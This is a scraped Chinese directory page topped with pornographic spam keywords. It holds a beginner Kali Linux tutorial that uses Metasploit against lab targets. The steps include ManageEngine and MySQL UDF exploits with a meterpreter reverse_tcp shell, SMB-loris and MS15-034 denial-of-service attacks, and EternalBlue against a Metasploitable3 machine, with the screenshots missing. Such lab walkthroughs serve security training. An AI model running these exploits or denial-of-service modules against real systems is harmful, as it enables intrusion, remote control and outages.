日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長提供免費(fèi)收錄網(wǎng)站服務(wù),提交前請做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點(diǎn)擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

1、攻擊windows服務(wù)器漏洞

用nmap對網(wǎng)段進(jìn)行掃描nmap -sP 192.168. 在進(jìn)行IP掃描

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

發(fā)現(xiàn)Windows服務(wù)器漏洞

步驟:

msfconsole---進(jìn)入滲透模塊

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

search manageengine-------搜索滲透模塊

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

search reverse_http---------搜索http滲透模塊

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

use
exploit/windows/http/manageeine_connectionid_write--------使用該滲透模塊

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

set rhosts 192.168.

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

set rport 8022

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

set LpORT 8080

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

run -----------------設(shè)置攻擊目標(biāo)地址,攻擊目標(biāo)端口,回連的端口號:

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

2、MySQL數(shù)據(jù)庫漏洞

nmap 192.168.-----掃描端口漏洞

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

步驟:

msfconsole-------進(jìn)入滲透模式

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

search mysql-------掃描數(shù)據(jù)庫滲透版本

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

use
exploit/multi/mysql/mysql_udf_payload----------使用該滲透版本進(jìn)行滲透

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

show options

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

set rhosts 192.168.--------設(shè)置攻擊端口號

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

set payload
windows/x64/meterpreter/reverse_tcp--------選擇該滲透方式進(jìn)行攻擊

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

run

3、拒絕服務(wù)攻擊漏洞:

使用nmap 192.168. 對端口號進(jìn)行掃描發(fā)現(xiàn)漏洞

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

步驟:

msfconsole-------進(jìn)入滲透模式

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

search dos/smb/smb-------搜索滲透版本

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

use
auxiliary/dos/smb/smb_loris-------使用該滲透版本進(jìn)行攻擊

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

show options--------

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

set rhosts 192.168.--------設(shè)置攻擊端口號

run-----滲透

4.永恒之藍(lán)漏洞復(fù)現(xiàn)

漏洞描述:

Eternalblue通過TCP端口445和139來利用SMBv1和NBT中的遠(yuǎn)程代碼執(zhí)行漏洞,惡意代碼會掃描開放445文件共享端口的Windows機(jī)器,無需用戶任何操作,只要開機(jī)上網(wǎng),不法分子就能在電腦和服務(wù)器中植入勒索軟件、遠(yuǎn)程控制木馬、虛擬貨幣挖礦機(jī)等惡意程序。

影響版本:

目前已知受影響的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

復(fù)現(xiàn)環(huán)境:

攻擊機(jī):Kali2020.3(IP:192.168.88.143)

靶機(jī):Metasploitable3Win2k8 (IP:192.168.88.140)

復(fù)現(xiàn)過程:

  1. 用nmap執(zhí)行C段掃描
Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

2、打開MSF

在終端輸入如下命令打開MSF終端:

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

搜索ms17_010模塊

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

這里可以得到幾個工具,其中
auxiliary/scanner/smb/smb_ms17_010是永恒之藍(lán)掃描模塊,
exploit/windows/smb/ms17_010_eternalblue是永恒之藍(lán)攻擊代碼,一般配合使用,前者先掃描,若顯示有漏洞,再進(jìn)行攻擊。

執(zhí)行掃描模塊

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

執(zhí)行ms17_010攻擊模塊

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 


Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

5.MySQL弱密碼登錄:

1、在kali上執(zhí)行mysql –h 192.168.26.123 –u root

2、登錄成功,進(jìn)入MySQL系統(tǒng)

3、測試效果:

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

6.http(ms15_034漏洞)

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

進(jìn)入msf模塊

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 


Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 


Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

查看要設(shè)置的東西show options

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

設(shè)置攻擊ip

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

攻擊前

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 


Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

攻擊后,我的是藍(lán)屏1秒后,跳轉(zhuǎn)到立即重啟界面

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

ssh測試

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

開啟端口轉(zhuǎn)發(fā)

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

查看情況

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 

在kali上嘗試連接(rdesktop IP)

Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 


Kali與編程:小白黑客是如何進(jìn)行Kali Linux滲透測試的?

 



專欄
1個月掌握Kali滲透與黑客編程
作者:Kali與編程
188幣
269人已購
查看

分享到:
標(biāo)簽:滲透 測試
用戶無頭像

網(wǎng)友整理

注冊時間:

網(wǎng)站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨(dú)大挑戰(zhàn)2018-06-03

數(shù)獨(dú)一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學(xué)四六

運(yùn)動步數(shù)有氧達(dá)人2018-06-03

記錄運(yùn)動步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績評定2018-06-03

通用課目體育訓(xùn)練成績評定